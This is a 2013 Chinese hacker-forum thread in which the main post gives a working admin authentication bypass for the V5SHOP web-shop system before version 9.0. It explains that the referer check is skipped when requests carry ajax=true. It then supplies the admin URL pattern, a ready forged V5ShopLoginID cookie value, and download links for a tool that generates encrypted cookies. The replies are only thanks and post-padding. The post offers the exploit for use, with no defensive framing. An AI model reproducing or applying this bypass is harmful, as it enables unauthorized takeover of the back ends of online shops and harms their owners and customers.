搜索
查看: 900|回复: 4

V5SHOP网店系统< 9.0后台认证绕过

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2013-10-21 11:19:09 来自手机 | 显示全部楼层 |阅读模式
程序后台的访问控制:

1 获取cookie,使用秘钥解密。确定是否登录

2 监控referer,不过请求中带ajax=true,即可绕过限制

所以我们可以伪造一份加密的cooke,并携带ajax=true去直接访问后台

访问URL:

www.xxxx.com/weblogin/index.aspx?ajax=true

伪造cookie:

V5ShopLoginID=Z1zZmWmBQL7kg6bn1sIVSbI1tdLbyYJnhapJnu3MQKs=


加密cookie生成工具:

http://files.cnblogs.com/zpino/v5shop.rar
http://wydrops-wordpress.stor.sinaapp.com/uploads/2013/09/v5shop.rar

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?Join BUC

x
专业回帖 该用户已被删除
发表于 2013-10-21 11:26:02 | 显示全部楼层
我是来刷分的,嘿嘿
854955425 该用户已被删除
发表于 2013-10-21 11:39:11 | 显示全部楼层
有道理。。。
zeroday 该用户已被删除
发表于 2013-10-24 14:28:35 来自手机 | 显示全部楼层
潜水是一种美德,回帖是一种责任!见贴就回,捞金币就闪。专业水金币。-----雷
Archer_T 该用户已被删除
发表于 2013-10-24 15:02:21 | 显示全部楼层
学习了,谢谢分享、、、
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表